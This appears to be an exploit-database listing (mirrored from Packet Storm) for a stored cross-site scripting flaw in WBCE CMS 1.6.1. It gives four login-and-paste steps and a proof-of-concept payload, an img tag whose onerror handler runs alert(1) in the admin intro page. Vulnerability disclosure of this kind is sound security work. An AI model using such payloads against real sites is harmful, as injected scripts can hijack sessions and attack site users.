Exploit for WBCE 1.6.1 Cross Site Scripting

Name: Exploit for WBCE 1.6.1 Cross Site Scripting
Rating: 5 (37 reviews)

2023-07-17 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:173502
# Exploit Title: WBCE - Stored XSS  
# Date: 07/2023  
# Exploit Author: Andrey Stoykov  
# Version: 1.6.1  
# Tested on: Windows Server 2022  
# Blog: http://msecureltd.blogspot.com  
  
  
Steps to Exploit:  
  
1. Login to application  
2. Browse to following URI "http://host/wbce/admin/pages/intro.php"  
3. Paste XSS payload "TEST"><img src=x onerror=alert(1)>"  
4. Then browse to settings "Settings->General Settings->Enable Intro  
Page->Enabled"